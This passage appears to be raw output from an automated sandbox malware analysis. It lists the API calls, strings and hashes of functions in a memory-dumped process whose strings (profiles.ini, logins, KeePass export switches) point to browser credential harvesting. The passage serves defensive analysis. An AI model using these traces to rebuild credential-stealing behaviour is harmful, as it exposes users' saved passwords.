                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                          • String ID:
                                          • API String ID: 829165378-0
                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                          APIs
                                          • memset.MSVCRT ref: 00404172
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          • wcscpy.MSVCRT ref: 004041D6
                                          • wcscpy.MSVCRT ref: 004041E7
                                          • memset.MSVCRT ref: 00404200
                                          • memset.MSVCRT ref: 00404215
                                          • _snwprintf.MSVCRT ref: 0040422F
                                          • wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 0040426E
                                          • memset.MSVCRT ref: 004042CD
                                          • memset.MSVCRT ref: 004042E2
                                          • _snwprintf.MSVCRT ref: 004042FE
                                          • wcscpy.MSVCRT ref: 00404311
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                          • API String ID: 2454223109-1580313836
                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                          APIs
                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                          • memcpy.MSVCRT ref: 004115C8
                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                          • API String ID: 4054529287-3175352466
                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                          • API String ID: 3143752011-1996832678
                                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                          • API String ID: 667068680-2887671607
                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                          • API String ID: 1607361635-601624466
                                          Similarity
                                          • API ID: _snwprintf$memset$wcscpy
                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                          • API String ID: 2000436516-3842416460
                                          APIs
                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                          Similarity
                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                          • String ID:
                                          • API String ID: 1043902810-0
                                          Similarity
                                          • API ID: ??2@??3@_snwprintfwcscpy
                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                          • API String ID: 2899246560-1542517562
                                          APIs
                                          • memset.MSVCRT ref: 0040DBCD
                                          • memset.MSVCRT ref: 0040DBE9
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                          • wcscpy.MSVCRT ref: 0040DC2D
                                          • wcscpy.MSVCRT ref: 0040DC3C
                                          • wcscpy.MSVCRT ref: 0040DC4C
                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                          • wcscpy.MSVCRT ref: 0040DCC3
                                          Similarity
                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                          • API String ID: 3330709923-517860148
                                          APIs
                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                          • memset.MSVCRT ref: 0040806A
                                          • memset.MSVCRT ref: 0040807F
                                          • _wtoi.MSVCRT ref: 004081AF
                                          • _wcsicmp.MSVCRT ref: 004081C3
                                          • memset.MSVCRT ref: 004081E4
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                          Similarity
                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                          • String ID: logins$null
                                          • API String ID: 3492182834-2163367763
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          • memset.MSVCRT ref: 004085CF
                                          • memset.MSVCRT ref: 004085F1
                                          • memset.MSVCRT ref: 00408606
                                          • strcmp.MSVCRT ref: 00408645
                                          • _mbscpy.MSVCRT ref: 004086DB
                                          • _mbscpy.MSVCRT ref: 004086FA
                                          • memset.MSVCRT ref: 0040870E
                                          • strcmp.MSVCRT ref: 0040876B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                          Similarity
                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                          • String ID: ---
                                          • API String ID: 3437578500-2854292027
                                          APIs
                                          • memset.MSVCRT ref: 0041087D
                                          • memset.MSVCRT ref: 00410892
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                          • DeleteObject.GDI32(?), ref: 004109D0
                                          • DeleteObject.GDI32(?), ref: 004109D6
                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                          Similarity
                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                          • String ID:
                                          • API String ID: 1010922700-0
                                          APIs
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                          • malloc.MSVCRT ref: 004186B7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                          • malloc.MSVCRT ref: 004186FE
                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                          Similarity
                                          • API ID: ??3@$FullNamePath$malloc$Version
                                          • String ID: |A
                                          • API String ID: 4233704886-1717621600
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                          • API String ID: 2081463915-1959339147
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                          Similarity
                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                          • API String ID: 2012295524-70141382
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                          • API String ID: 667068680-3953557276
                                          APIs
                                          • GetDC.USER32(00000000), ref: 004121FF
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                          • SelectObject.GDI32(?,?), ref: 00412251
                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                          • SetCursor.USER32(00000000), ref: 004122BC
                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                          • memcpy.MSVCRT ref: 0041234D
                                          Similarity
                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                          • String ID:
                                          • API String ID: 1700100422-0
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                          • String ID:
                                          • API String ID: 552707033-0
                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                          • memcpy.MSVCRT ref: 0040C11B
                                          • strchr.MSVCRT ref: 0040C140
                                          • strchr.MSVCRT ref: 0040C151
                                          • _strlwr.MSVCRT ref: 0040C15F
                                          • memset.MSVCRT ref: 0040C17A
                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                          • String ID: 4$h
                                          • API String ID: 4066021378-1856150674
                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf
                                          • String ID: %%0.%df
                                          • API String ID: 3473751417-763548558
                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                          APIs
                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                          • GetTickCount.KERNEL32 ref: 0040610B
                                          • GetParent.USER32(?), ref: 00406136
                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                          • String ID: A
                                          • API String ID: 2892645895-3554254475
                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                          APIs
                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                          • memset.MSVCRT ref: 0040DA23
                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
